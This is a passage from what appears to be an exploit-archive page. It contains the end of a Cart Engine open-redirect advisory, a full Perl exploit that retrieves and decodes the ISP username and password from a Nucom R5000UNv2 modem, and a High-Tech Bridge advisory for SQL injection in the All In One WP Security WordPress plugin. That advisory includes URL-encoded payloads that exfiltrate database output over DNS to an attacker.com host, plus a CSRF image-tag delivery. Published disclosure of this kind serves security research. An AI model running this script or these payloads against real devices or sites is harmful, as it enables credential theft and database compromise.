no-cache Location: http://www.google.com/search?hl=en&q= Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8 sent 403, rcvd 380 === Solution === Upgrade to Cart Engine 4.0. === Disclosure Timeline === 2014-08-08 – Vulnerability Discovered 2014-08-10 – Initial vendor notification 2014-08-20 – The vendor fixed the vulnerability 2014-09-15 – Public advisory === References === [1] https://www.owasp.org/index.php/SQL_Injection_Prevention_Cheat_Sheet [2] https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet [3] https://www.owasp.org/index.php/Unvalidated_Redirects_and_Forwards_Cheat_Sheet Source

#!/usr/bin/perl # Exploit Author: Sebastián Magof # Hardware: Modem Nucom ADSL R5000UNv2 # Software Version: R5TC008 # Vulnerable file: guidewan.html # location: http://gateway/telecom_GUI/guidewan.html # Bug: ISP usr+pwd disclosure # Type: Local # Date: 24/09/2014 # Vendor Homepage: http://www.nucom.hk/ # Version: 2.00(R5TC008) # Tested on: Linux Fedora 20/Windows 7 # (\/) # (**) Alpha (: #(")(") #MADE IN ARGENTINA; #usage:perl exploit.pl use LWP::UserAgent; use HTTP::Request; use MIME::Base64; #begin print "\n\n************************************************************\n"; print "* Modem Nucom ADSL R5000UNv2 ISP credentials disclosure *\n";#default gateway 192.168.1.1 (Arnet Telecom ISP Argentina) print "************************************************************\n\n"; #isp pwd disclosure file my $url = "http://192.168.1.1/telecom_GUI/guidewan.html"; #UserAgent my $ua = LWP::UserAgent->new(); $ua->agent("Mozilla/5.0"); #Request. my $req = HTTP::Request->new(GET => $url); my $request = $ua->request($req); my $content = $request->content(); #content my ($pwd) = $content =~ m/pppPassword.value = '(.+)';/; my ($usr) = $content =~ m/pppUserName.value = '(.+)';/; #decode base64 2 times pwd; $encoded = $pwd; $decoded = decode_base64($encoded); #decode base64 pwd; $decoded2 = decode_base64($decoded); #2nd base64 pwd; #ISP usr+pwd Arnet Telecom Argentina; print "User: $usr\n"; print "Password: $decoded2\n\n"; exit(0); __EOF__ Source

Advisory ID: HTB23231 Product: All In One WP Security WordPress plugin Vendor: Tips and Tricks HQ, Peter, Ruhul, Ivy Vulnerable Version(s): 3.8.2 and probably prior Tested Version: 3.8.2 Advisory Publication: September 3, 2014 [without technical details] Vendor Notification: September 3, 2014 Vendor Patch: September 12, 2014 Public Disclosure: September 24, 2014 Vulnerability Type: SQL Injection [CWE-89] CVE Reference: CVE-2014-6242 Risk Level: Medium CVSSv2 Base Score: 6.5 (AV:N/AC:L/Au:S/C:P/I:P/A:P) Solution Status: Fixed by Vendor Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) ----------------------------------------------------------------------------------------------- Advisory Details: High-Tech Bridge Security Research Lab discovered two SQL injection vulnerabilities in All In One WP Security WordPress plugin, which can be exploited to perform SQL Injection attacks. Both vulnerabilities require administrative privileges, however can be also exploited by non-authenticated attacker via CSRF vector. 1) SQL Injection in All In One WP Security WordPress plugin: CVE-2014-6242 1.1 The vulnerability exists due to insufficient sanitization of user-supplied input passed via the "orderby" HTTP GET parameters to "/wp-admin/admin.php" script. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code. The PoC code below is based on DNS Exfiltration technique and may be used to demonstrate vulnerability in the "orderby" parameter if the database of the vulnerable application is hosted on a Windows system. The PoC will send a DNS request demanding IP addess for `version()` (or any other sensetive output from the database) sub-domain of ".attacker.com" (a domain name, DNS server of which is controlled by the attacker): http://[host]/wp-admin/admin.php?page=aiowpsec&tab=tab1&orderby=%28select%20load_file%28CONCAT%28CHAR%2892%29,CHAR%2892%29,%28select%20version%28%29%29,CHAR%2846%29,CHAR%2897%29,CHAR%28116%29,CHAR%28116%29,CHAR%2897%29,CHAR%2899%29,CHAR%28107%29,CHAR%28101%29,CHAR%28114%29,CHAR%2846%29,CHAR%2899%29,CHAR%28111%29,CHAR%28109%29,CHAR%2892%29,CHAR%28102%29,CHAR%28111%29,CHAR%28111%29,CHAR%2898%29,CHAR%2897%29,CHAR%28114%29%29%29%29 This vulnerability could also be exploited by a remote non-authenticated attacker via CSRF vector, since the application is prone to Cross-Site Request Forgery (CSRF) attacks. In order to do so an attacker should trick a logged-in administrator to visit a web page with an CSRF exploit, e.g.: http://[host]/wp-admin/admin.php?page=aiowpsec&tab=tab1&order=,%28select%20load_file%28CONCAT%28CHAR%2892%29,CHAR%2892%29,%28select%20version%28%29%29,CHAR%2846%29,CHAR%2897%29,CHAR%28116%29,CHAR%28116%29,CHAR%2897%29,CHAR%2899%29,CHAR%28107%29,CHAR%28101%29,CHAR%28114%29,CHAR%2846%29,CHAR%2899%29,CHAR%28111%29,CHAR%28109%29,CHAR%2892%29,CHAR%28102%29,CHAR%28111%29,CHAR%28111%29,CHAR%2898%29,CHAR%2897%29,CHAR%28114%29%29%29%29 1.2 The vulnerability exists due to insufficient sanitization of user-supplied input passed via the "order" HTTP GET parameters to "/wp-admin/admin.php" script. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code. The PoC code below is based on DNS Exfiltration technique and may be used to demonstrate vulnerability in the "order" parameter if the database of the vulnerable application is hosted on a Windows system. The PoC will send a DNS request demanding IP addess for `version()` (or any other sensetive output from the database) sub-domain of ".attacker.com" (a domain name, DNS server of which is controlled by the attacker): http://[host]/wp-admin/admin.php?page=aiowpsec&tab=tab1&orderby=%28select%20load_file%28CONCAT%28CHAR%2892%29,CHAR%2892%29,%28select%20version%28%29%29,CHAR%2846%29,CHAR%2897%29,CHAR%28116%29,CHAR%28116%29,CHAR%2897%29,CHAR%2899%29,CHAR%28107%29,CHAR%28101%29,CHAR%28114%29,CHAR%2846%29,CHAR%2899%29,CHAR%28111%29,CHAR%28109%29,CHAR%2892%29,CHAR%28102%29,CHAR%28111%29,CHAR%28111%29,CHAR%2898%29,CHAR%2897%29,CHAR%28114%29%29%29%29 This vulnerability could also be exploited by a remote non-authenticated attacker via CSRF vector, since the application is prone to Cross-Site Request Forgery (CSRF) attacks. In order to do so an attacker should trick a logged-in administrator to visit a web page with CSRF exploit, e.g.: <img src="http://[host]/wp-admin/admin.php?page=aiowpsec&tab=tab1&orderby=%28select%20load_file%28CONCAT%28CHAR%2892%29,CHAR%2892%29,%28select%20version%28%29%29,CHAR%2846%29,CHAR%2897%29,CHAR%28116%29,CHAR%28116%29,CHAR%2897%29,CHAR%2899%29,CHAR%28107%29,CHAR%28101%29,CHAR%28114%29,CHAR%2846%29,CHAR%2899%29,CHAR%28111%29,CHAR%28109%29,CHAR%2892%29,CHAR%28102%29,CHAR%28111%29,CHAR%28111%29,CHAR%2898%29,CHAR%2897%29,CHAR%28114%29%29%29%29"> ----------------------------------------------------------------------------------------------- Solution: Update to All In One WP Security 3.8.3 More Information: https://wordpress.org/plugins/all-in-one-wp-security-and-firewall/changelog/ ----------------------------------------------------------------------------------------------- References: [1] High-Tech Bridge Advisory HTB23231 - https://www.htbridge.com/advisory/HTB23231 - Two SQL Injections in All In One WP Security WordPress plugin. [2] All In One WP Security WordPress plugin - http://www.tipsandtricks-hq.com/wordpress-security-and-firewall-plugin - All round best WordPress security plugin. [3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE® is a dictionary of publicly known information security vulnerabilities and exposures. [4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types. [5] ImmuniWeb® SaaS - https://www.htbridge.com/immuniweb/ - hybrid of manual web application penetration test and cutting-edge vulnerability scanner available online via a Software-as-a-Service (SaaS) model. ----------------------------------------------------------------------------------------------- Disclaimer: The information provided in this Advisory is provided "as is" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References. Source